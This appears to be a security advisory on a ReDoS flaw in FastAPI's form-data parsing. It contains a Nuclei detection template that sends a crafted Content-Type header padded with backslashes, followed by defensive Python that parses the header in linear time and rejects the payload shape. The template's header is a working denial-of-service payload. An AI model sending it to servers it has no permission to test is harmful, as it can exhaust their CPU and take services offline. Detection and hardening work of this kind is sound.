ReDoS Vulnerability in Form Data Parsing
A Regular Expression Denial of Service (ReDoS) vulnerability was identified in FastAPI version 0.109.0, specifically when parsing Form data. The issue, which causes the server to lock up and a CPU core to reach 100% usage, was patched in version 0.109.1.
Available publicly on Mar 15 2024 | Available with Premium on Mar 14 2024
Nuclei Template
id: fastapi-redos
info:
  name: Check FastAPI ReDoS Vulnerability in Form Data Parsing
  author: DanMcInerney, byt3bl33d3r, nicecatch2000
  severity: high
  description: Checks for ReDoS vulnerability in FastAPI when parsing form data with a malicious Content-Type header.
  reference:
    - https://huntr.com/bounties/dd680268-d735-4f33-a358-d827694ab035
  classification:
    cvss-score: 7.5
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cwe-id: CWE-400 # Resource Exhaustion
  tags: fastapi, redos, dos, vulnerability, ai, ml, protectai, huntr
requests:
  - method: POST
    path:
      - "{{BaseURL}}/submit/"
    headers:
      Content-Type: "application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'"
    body: "input=1"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
          - 502
          - 504
      # Nuclei has no "time" matcher type; the response-time check is expressed
      # as a dsl matcher on the request duration (seconds). Adjust the threshold
      # based on expected response times.
      - type: dsl
        dsl:
          - "duration>=5"
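The defensive counterpart to the check above, as an added example that is not FastAPI's, python-multipart's or Sightline's code: the reported payload is a Content-Type header whose parameter value opens a quoted string, never closes it, and is padded with a long run of backslashes. A parser that walks the header once, left to right, cannot be made to do superlinear work by that shape, so a middleware or reverse proxy can validate the header before the form parser ever sees it. The names `parse_content_type`, `is_safe_content_type`, the `MAX_HEADER_LEN` bound and the `REDOS_SHAPED_HEADER` sample are all assumptions made for this example.

```python
"""Linear-time Content-Type parsing as a pre-parsing guard (added example)."""
from __future__ import annotations

MAX_HEADER_LEN = 1024  # assumption: no legitimate Content-Type header needs more


class BadContentType(ValueError):
    """Raised for oversized or malformed Content-Type headers."""


def parse_content_type(value: str) -> tuple[str, dict[str, str]]:
    """Parse 'type/subtype; name=token; name="quoted \\" text"' in one pass.

    Each character is visited at most once (an escape pair consumes two), so
    the cost is O(len(value)) however the input is shaped; no backtracking.
    """
    if len(value) > MAX_HEADER_LEN:
        raise BadContentType("Content-Type header too long")
    n = len(value)
    semi = value.find(";")
    media = (value if semi == -1 else value[:semi]).strip().lower()
    if "/" not in media:
        raise BadContentType("missing type/subtype")
    params: dict[str, str] = {}
    i = n if semi == -1 else semi + 1
    while i < n:
        while i < n and value[i] in " \t":  # skip whitespace before a parameter
            i += 1
        if i >= n:
            break
        start = i
        while i < n and value[i] not in "=;":  # parameter name runs to '='
            i += 1
        name = value[start:i].strip().lower()
        if i >= n or value[i] != "=" or not name:
            raise BadContentType("malformed parameter")
        i += 1  # consume '='
        if i < n and value[i] == '"':  # quoted-string value
            i += 1
            buf: list[str] = []
            closed = False
            while i < n:
                ch = value[i]
                if ch == "\\" and i + 1 < n:  # quoted-pair: next char is literal
                    buf.append(value[i + 1])
                    i += 2
                    continue
                if ch == '"':
                    closed = True
                    i += 1
                    break
                buf.append(ch)
                i += 1
            if not closed:  # the payload shape ends up here, in linear time
                raise BadContentType("unterminated quoted parameter value")
            val = "".join(buf)
        else:  # token value runs to the next ';'
            start = i
            while i < n and value[i] != ";":
                i += 1
            val = value[start:i].strip()
        params[name] = val
        while i < n and value[i] in " \t":  # whitespace before the next ';'
            i += 1
        if i < n:
            if value[i] != ";":
                raise BadContentType("unexpected text after parameter value")
            i += 1
    return media, params


def is_safe_content_type(value: str) -> bool:
    """Verdict a middleware would compute before handing the body to a form parser."""
    try:
        parse_content_type(value)
    except BadContentType:
        return False
    return True


# Constructed header in the shape of the reported payload: an opened quoted
# string followed by a run of backslashes. The run length is arbitrary.
REDOS_SHAPED_HEADER = 'application/x-www-form-urlencoded; !="' + "\\" * 200 + "'"

if __name__ == "__main__":
    print(parse_content_type('multipart/form-data; boundary="ab\\"c"; charset=utf-8'))
    print("payload-shaped header rejected:", not is_safe_content_type(REDOS_SHAPED_HEADER))
```

The guard rejects the payload-shaped header for a structural reason (an unterminated quoted value) rather than by pattern-matching the backslashes, so it also covers variants that use different padding characters; the length cap is a second, independent limit on how much work any single header can cause.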